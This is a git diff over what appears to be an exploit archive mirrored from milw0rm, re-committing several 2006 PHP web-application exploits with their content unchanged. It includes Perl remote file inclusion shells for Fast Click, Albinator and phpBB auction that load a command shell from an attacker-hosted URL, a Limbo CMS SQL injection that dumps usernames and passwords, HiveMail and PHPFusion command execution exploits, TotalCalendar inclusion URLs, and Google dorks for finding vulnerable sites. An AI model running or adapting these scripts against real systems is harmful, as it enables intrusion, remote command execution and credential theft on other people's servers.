+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01). +chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00). +chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00); + +$data='-----------------------------7d63ba6e09fc +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +5242880 +-----------------------------7d63ba6e09fc +Content-Disposition: form-data; name="avatar"; filename="whatever.jpg" +Content-Type: image/jpeg + +'.$shell.' 
+-----------------------------7d63ba6e09fc-- +'; + +echo "step 4 -> launch commands...\r\n"; +$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg"); +$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"56789")) + { + echo "Exploit succeeded...\r\n\r\n"; + $temp=explode("56789",$html); + echo $temp[1]; + die; + } +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-05-02] diff --git a/platforms/php/webapps/1740.pl b/platforms/php/webapps/1740.pl index b345a6ac9..b9adb283f 100755 --- a/platforms/php/webapps/1740.pl +++ b/platforms/php/webapps/1740.pl 
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -## -# Fast Click <= 2.3.8 Remote File Inclusion exploit -# Bug discovered and cod3d by R@1D3N (amin emami) -#Greet:Outlaw - Aura - Dltrp - Cl0wn - B3HZAD - sm0k3r - Exploitercode - Str0ke and all persian Cyber team -#http://www.aria-security.net -#Dork:inurl:"fclick.php?fid" -# usage: -# perl fc.pl <target> <cmd shell location> <cmd shell variable> -# perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd -# cmd shell example: <?system($cmd);?> -# cmd shell variable: ($_GET[cmd]); - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while(<STDIN>) - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'show.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.*)/) - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " Fast Click <= 2.3.8 Remote File Inclusion exploit\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl fc.pl <target> <cmd shell location> <cmd shell variable>\r\n\n"; - print " <Site> - Full path to Fastclick ex: 
http://www.site.com/fclick/ \r\n"; - print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n"; - print " <cmd variable> - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " bug discovered by RAYD3N \r\n"; - print " www.Aria-security.net/Forums/ \r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-05-02] +#!/usr/bin/perl +## +# Fast Click <= 2.3.8 Remote File Inclusion exploit +# Bug discovered and cod3d by R@1D3N (amin emami) +#Greet:Outlaw - Aura - Dltrp - Cl0wn - B3HZAD - sm0k3r - Exploitercode - Str0ke and all persian Cyber team +#http://www.aria-security.net +#Dork:inurl:"fclick.php?fid" +# usage: +# perl fc.pl <target> <cmd shell location> <cmd shell variable> +# perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd +# cmd shell example: <?system($cmd);?> +# cmd shell variable: ($_GET[cmd]); + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while(<STDIN>) + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'show.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.*)/) + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else 
{print "[shell] \$";}}}last; + +sub head() + { + print "\n============================================================================\r\n"; + print " Fast Click <= 2.3.8 Remote File Inclusion exploit\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl fc.pl <target> <cmd shell location> <cmd shell variable>\r\n\n"; + print " <Site> - Full path to Fastclick ex: http://www.site.com/fclick/ \r\n"; + print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n"; + print " <cmd variable> - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " bug discovered by RAYD3N \r\n"; + print " www.Aria-security.net/Forums/ \r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-05-02] diff --git a/platforms/php/webapps/1744.pl b/platforms/php/webapps/1744.pl index 54da725dd..03e378f71 100755 --- a/platforms/php/webapps/1744.pl +++ b/platforms/php/webapps/1744.pl 
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -## -#Albinator Multiple Parameter File Inclusion -# Bug discovered by VietMafia and r0t -# code copier: webDEViL w3bd3vil[at]gmail.com -#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit -#Dork:"powered by Albinator " -# usage: -# perl wb.pl <target> <cmd shell location> <cmd shell variable> -# perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd -# cmd shell example: <?system($cmd);?> -# cmd shell variable: ($_GET[cmd]); - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while(<STDIN>) - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'eshow.php?Config_rootdir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; -## can change eshow.php to eday.php or forgot.php - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.*)/) - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " Albinator Multiple Parameter File Inclusion\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n"; - print " <Site> - Full path to Albinator ex: 
http://www.site.com/ \r\n"; - print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n"; - print " <cmd variable> - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " webDEViL w3bd3vil[at]gmail.com \r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-05-03] +#!/usr/bin/perl +## +#Albinator Multiple Parameter File Inclusion +# Bug discovered by VietMafia and r0t +# code copier: webDEViL w3bd3vil[at]gmail.com +#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit +#Dork:"powered by Albinator " +# usage: +# perl wb.pl <target> <cmd shell location> <cmd shell variable> +# perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd +# cmd shell example: <?system($cmd);?> +# cmd shell variable: ($_GET[cmd]); + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while(<STDIN>) + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'eshow.php?Config_rootdir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; +## can change eshow.php to eday.php or forgot.php + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.*)/) + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub 
head() + { + print "\n============================================================================\r\n"; + print " Albinator Multiple Parameter File Inclusion\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n"; + print " <Site> - Full path to Albinator ex: http://www.site.com/ \r\n"; + print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n"; + print " <cmd variable> - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " webDEViL w3bd3vil[at]gmail.com \r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-05-03] diff --git a/platforms/php/webapps/1747.pl b/platforms/php/webapps/1747.pl index 528af2835..150ab30cf 100755 --- a/platforms/php/webapps/1747.pl +++ b/platforms/php/webapps/1747.pl 
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -## -#phpBB auction mod - Remote File Inclusion Vuln -# Bug discovered by VietMafia -# code copier: webDEViL w3bd3vil[at]gmail.com -#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit -# dork: intext:"phpbb - auction" inurl:"auction" -# usage: -# perl wb1.pl <target> <cmd shell location> <cmd shell variable> -# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd -# cmd shell example: <?system($cmd);?> -# cmd shell variable: ($_GET[cmd]); - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while(<STDIN>) - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.*)/) - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " phpBB auction mod - Remote File Inclusion Vuln\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\r\n\n"; - print " <Site> - Full path to phpBB auction ex: http://www.site.com/ 
or http://www.site.com/phpbb/ \r\n"; - print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n"; - print " <cmd variable> - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " webDEViL w3bd3vil[at]gmail.com \r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-05-04] +#!/usr/bin/perl +## +#phpBB auction mod - Remote File Inclusion Vuln +# Bug discovered by VietMafia +# code copier: webDEViL w3bd3vil[at]gmail.com +#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit +# dork: intext:"phpbb - auction" inurl:"auction" +# usage: +# perl wb1.pl <target> <cmd shell location> <cmd shell variable> +# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd +# cmd shell example: <?system($cmd);?> +# cmd shell variable: ($_GET[cmd]); + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while(<STDIN>) + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.*)/) + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub head() 
+ { + print "\n============================================================================\r\n"; + print " phpBB auction mod - Remote File Inclusion Vuln\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\r\n\n"; + print " <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \r\n"; + print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n"; + print " <cmd variable> - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " webDEViL w3bd3vil[at]gmail.com \r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-05-04] diff --git a/platforms/php/webapps/1751.php b/platforms/php/webapps/1751.php index ad5e27816..fb8287c53 100755 --- a/platforms/php/webapps/1751.php +++ b/platforms/php/webapps/1751.php 
@@ -1,51 +1,51 @@ -<pre> -[i] Limbo CMS (option=weblinks) sql injection exploit -[i] coded by [Oo] -<?php - -if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id']))) -{ -?> -[*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id] -[*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1 - -[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" -<?php -die; -} - -$host = $_GET['host']; -$path = $_GET['path']; -$id = $_GET['id']; - -$success = 0; - -$fp = fsockopen($host, 80, $errno, $errstr, 30); -if (!$fp) { - die("[-] Connection Error!"); -} -else { - - $out = "GET $path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20from%20lm_users%20where%20id=$id/* HTTP/1.1\r\n"; - $out .= "Host: $host\r\n"; - $out .= "Connection: Close\r\n\r\n"; - - fwrite($fp, $out); - while (!feof($fp)) { - $f = fgets($fp, 1024); - if ( (preg_match("/<div class=\"componentheading\" >/",$f)) && (preg_match("/login/",$f)) ) - { - echo "$f"; - echo "[+] Enjoy! 
:><br>"; - $success = 1; - } - } - fclose($fp); - - if (!$success) - echo "<br>[-] exploit failed :<<br>"; -} -?> -</pre> - -# milw0rm.com [2006-05-05] +<pre> +[i] Limbo CMS (option=weblinks) sql injection exploit +[i] coded by [Oo] +<?php + +if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id']))) +{ +?> +[*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id] +[*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1 + +[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" +<?php +die; +} + +$host = $_GET['host']; +$path = $_GET['path']; +$id = $_GET['id']; + +$success = 0; + +$fp = fsockopen($host, 80, $errno, $errstr, 30); +if (!$fp) { + die("[-] Connection Error!"); +} +else { + + $out = "GET $path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20from%20lm_users%20where%20id=$id/* HTTP/1.1\r\n"; + $out .= "Host: $host\r\n"; + $out .= "Connection: Close\r\n\r\n"; + + fwrite($fp, $out); + while (!feof($fp)) { + $f = fgets($fp, 1024); + if ( (preg_match("/<div class=\"componentheading\" >/",$f)) && (preg_match("/login/",$f)) ) + { + echo "$f"; + echo "[+] Enjoy! :><br>"; + $success = 1; + } + } + fclose($fp); + + if (!$success) + echo "<br>[-] exploit failed :<<br>"; +} +?> +</pre> + +# milw0rm.com [2006-05-05] diff --git a/platforms/php/webapps/1753.txt b/platforms/php/webapps/1753.txt index 810aa8ff9..24f0457d0 100755 --- a/platforms/php/webapps/1753.txt +++ b/platforms/php/webapps/1753.txt 
@@ -1,19 +1,19 @@ -Title: TotalCalendar <=2.30 - Remote File Include Vulnerability ------------------------------------------------------------------ -Vendor: SweetPHP -URL: http://sweetphp.com ------------------------------------------------------------------ - -Credits: -Discovered by: 'Aesthetico' -http://www.majorsecurity.de ------------------------------------------------------------------ -Search for: "Powered by TotalCalendar" ------------------------------------------------------------------ - -Exploitation: - -/index.php?inc_dir=http://www.yourspace.com/yourscript.php? -/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF - -# milw0rm.com [2006-05-05] +Title: TotalCalendar <=2.30 - Remote File Include Vulnerability +----------------------------------------------------------------- +Vendor: SweetPHP +URL: http://sweetphp.com +----------------------------------------------------------------- + +Credits: +Discovered by: 'Aesthetico' +http://www.majorsecurity.de +----------------------------------------------------------------- +Search for: "Powered by TotalCalendar" +----------------------------------------------------------------- + +Exploitation: + +/index.php?inc_dir=http://www.yourspace.com/yourscript.php? +/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF + +# milw0rm.com [2006-05-05] diff --git a/platforms/php/webapps/1756.pl b/platforms/php/webapps/1756.pl index f26d95736..c8131355c 100755 --- a/platforms/php/webapps/1756.pl +++ b/platforms/php/webapps/1756.pl 
@@ -1,124 +1,124 @@ -#!/usr/bin/perl # -# # -# HiveMail <= 1.3 remote command execution exploit # -# # -################################################################################# -# # -# Advisory: # -# http://www.gulftech.org/?node=research&article_id=00098-02102006 # -# # -# To get the hivesession: # -# log on hivemail with firefox then look at the hivesession number in the url. # -# (yes i know...) # -# # -################################################################################# -# # -# Dork: # -# "Already have an account?" "Enter your information below to log in." # -# # -######################################################################## -# # -# coded by [Oo] # -# # -################# - - -require LWP::UserAgent; -use URI; -use Getopt::Long; - -$| = 1; # fflush stdout after print - -# Default options -# connection -my $basic_auth_user = ''; -my $basic_auth_pass = ''; -my $proxy = ''; -my $proxy_user = ''; -my $proxy_pass = ''; -my $conn_timeout = 15; - -# general -my $host; -my $session; - - print "\n[i] HiveMail <= 1.3 remote command execution exploit\n"; - print "[i] coded by [Oo]\n"; - - - # read command line options - my $options = GetOptions ( - - #general options - 'host=s' => \$host, # input host to test. - 'session=s' => \$session, # input host to test. 
- # connection options - 'basic_auth_user=s' => \$basic_auth_user, - 'basic_auth_pass=s' => \$basic_auth_pass, - 'proxy=s' => \$proxy, - 'proxy_user=s' => \$proxy_user, - 'proxy_pass=s' => \$proxy_pass, - 'timeout=i' => \$conn_timeout); - - # command line sanity check - &show_usage unless ($host); - &show_usage unless ($session); - - # main loop - while (1){ - print "\n[hivemail] "; - my $cmd = <STDIN>; - hm_xploit ($cmd); - } - - exit (1); - -#exploit -sub hm_xploit { - chomp (my $data = shift); - - if ($data eq "exit") { print "\n[e] Exit!\n";exit(); } - - my $exp = $host."addressbook.add.php?hivesession=".$session."&cmd=quick&messageid=\");echo%20\"start_er\";system(\$com);echo%20\"end_er\";\@d(\"&popid=1&com=".$data." "; - my $req = new HTTP::Request 'GET' => $exp; - - - my $ua = new LWP::UserAgent; - $ua->timeout($conn_timeout); - - if ($basic_auth_user){ - $req->authorization_basic($basic_auth_user, $basic_auth_pass) - } - if ($proxy){ - $ua->proxy(['http'] => $proxy); - $req->proxy_authorization_basic($proxy_user, $proxy_pass); - } - - - my $res = $ua->request($req); - my $show = $res->content; - - print"\n"; - if ($show =~ m/start_er(.*?)end_er/ms) { - my $out = $1; - $out =~ s/^\s+|\s+$//gs; - if ($out) { - print "$out\n"; - } - } - -} - -# show options -sub show_usage { - print "\n[*] Usage: ./hmail_exp.pl [options] [host] [session]\n"; - print "[*] Options:\n"; - print "\t--proxy (http), --proxy_user, --proxy_pass\n"; - print "\t--basic_auth_user, --basic_auth_pass\n"; - print "\t--timeout \n"; - print "[*] Example:\n"; - print " hmail_exp.pl --host=http://127.0.0.1/hivemail/ --session=22ead72ecf6af376a801923466a23efa\n"; - exit(1); -} - -# milw0rm.com [2006-05-06] +#!/usr/bin/perl # +# # +# HiveMail <= 1.3 remote command execution exploit # +# # +################################################################################# +# # +# Advisory: # +# http://www.gulftech.org/?node=research&article_id=00098-02102006 # +# # +# To get the hivesession: # +# 
log on hivemail with firefox then look at the hivesession number in the url. # +# (yes i know...) # +# # +################################################################################# +# # +# Dork: # +# "Already have an account?" "Enter your information below to log in." # +# # +######################################################################## +# # +# coded by [Oo] # +# # +################# + + +require LWP::UserAgent; +use URI; +use Getopt::Long; + +$| = 1; # fflush stdout after print + +# Default options +# connection +my $basic_auth_user = ''; +my $basic_auth_pass = ''; +my $proxy = ''; +my $proxy_user = ''; +my $proxy_pass = ''; +my $conn_timeout = 15; + +# general +my $host; +my $session; + + print "\n[i] HiveMail <= 1.3 remote command execution exploit\n"; + print "[i] coded by [Oo]\n"; + + + # read command line options + my $options = GetOptions ( + + #general options + 'host=s' => \$host, # input host to test. + 'session=s' => \$session, # input host to test. + # connection options + 'basic_auth_user=s' => \$basic_auth_user, + 'basic_auth_pass=s' => \$basic_auth_pass, + 'proxy=s' => \$proxy, + 'proxy_user=s' => \$proxy_user, + 'proxy_pass=s' => \$proxy_pass, + 'timeout=i' => \$conn_timeout); + + # command line sanity check + &show_usage unless ($host); + &show_usage unless ($session); + + # main loop + while (1){ + print "\n[hivemail] "; + my $cmd = <STDIN>; + hm_xploit ($cmd); + } + + exit (1); + +#exploit +sub hm_xploit { + chomp (my $data = shift); + + if ($data eq "exit") { print "\n[e] Exit!\n";exit(); } + + my $exp = $host."addressbook.add.php?hivesession=".$session."&cmd=quick&messageid=\");echo%20\"start_er\";system(\$com);echo%20\"end_er\";\@d(\"&popid=1&com=".$data." 
"; + my $req = new HTTP::Request 'GET' => $exp; + + + my $ua = new LWP::UserAgent; + $ua->timeout($conn_timeout); + + if ($basic_auth_user){ + $req->authorization_basic($basic_auth_user, $basic_auth_pass) + } + if ($proxy){ + $ua->proxy(['http'] => $proxy); + $req->proxy_authorization_basic($proxy_user, $proxy_pass); + } + + + my $res = $ua->request($req); + my $show = $res->content; + + print"\n"; + if ($show =~ m/start_er(.*?)end_er/ms) { + my $out = $1; + $out =~ s/^\s+|\s+$//gs; + if ($out) { + print "$out\n"; + } + } + +} + +# show options +sub show_usage { + print "\n[*] Usage: ./hmail_exp.pl [options] [host] [session]\n"; + print "[*] Options:\n"; + print "\t--proxy (http), --proxy_user, --proxy_pass\n"; + print "\t--basic_auth_user, --basic_auth_pass\n"; + print "\t--timeout \n"; + print "[*] Example:\n"; + print " hmail_exp.pl --host=http://127.0.0.1/hivemail/ --session=22ead72ecf6af376a801923466a23efa\n"; + exit(1); +} + +# milw0rm.com [2006-05-06] diff --git a/platforms/php/webapps/1760.php b/platforms/php/webapps/1760.php index 28553d958..2e0a7be57 100755 --- a/platforms/php/webapps/1760.php +++ b/platforms/php/webapps/1760.php 
@@ -1,610 +1,610 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload &\r\n"; -echo "local inclusion vulnerabilities\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -if ($argc<6) { -echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PHPFusion\r\n"; -echo "cmd: a shell command\r\n"; -echo "user/pass: you need a valid user account to upload an avatar\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /phpfusion/ your_username password cat ./../../config.php\r\n"; -echo "php ".$argv[0]." localhost /phpfusion/ your_username password ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; -die; -} - -/* explaination: - - software site: http://www.php-fusion.co.uk/ - - description: "a light-weight open-source content management system (CMS) - written in PHP. It utilises a mySQL database to store your site content and - includes a simple, comprehensive adminstration system." - - tested versions: PHPFusion v6.00.306 - PHPFusion v6.00.207 - PHPFusion v6.00.110 - - - i) vulnerable code in includes/update_profile_include.php at lines 69-90: - - ... 
- $newavatar = $_FILES['user_avatar']; - if ($userdata['user_avatar'] == "" && !empty($newavatar['name']) && is_uploaded_file($newavatar['tmp_name'])) { - if (preg_match("/^[-0-9A-Z_\.\[\]]+$/i", $newavatar['name']) && $newavatar['size'] <= 30720) { - $avatarext = strrchr($newavatar['name'],"."); - if (eregi(".gif", $avatarext) || eregi(".jpg", $avatarext) || eregi(".png", $avatarext)) { - $avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], ".")); - $avatarname = $avatarname."[".$userdata['user_id']."]".$avatarext; - $set_avatar = "user_avatar='$avatarname', "; - move_uploaded_file($newavatar['tmp_name'], IMAGES."avatars/".$avatarname); - chmod(IMAGES."avatars/".$avatarname,0644); - if ($size = @getimagesize(IMAGES."avatars/".$avatarname)) { - if ($size['0'] > 100 || $size['1'] > 100) { - unlink(IMAGES."avatars/".$avatarname); - $set_avatar = ""; - } - } else { - unlink(IMAGES."avatars/".$avatarname); - $set_avatar = ""; - } - } - } - } - ... - - A remote user can upload a malicious avatar with multiple extensions, - (ex.: .php.php.gif-fakechars-) and with php code inside as EXIF metadata - content. - It seems that Apache mod_mime module considers double-extension files like - file.php.gif[somefakechars] to be valid PHP files and runs the arbitrary - code that has been uploaded. Actually I can't say which Apache versions, this - was tested against Apache/1.3.27 with PHP/4.3.3 - - A note: file is renamed like this - .php.php[user_id].gif-fakechars- - - ii) vulnerable code in infusions/last_seen_users_panel/last_seen_users_panel.php - at lines 12-16: - - ... - if (file_exists(INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php")) { - include INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php"; -} else { - include INFUSIONS."last_seen_users_panel/locale/English.php"; -} - ... 
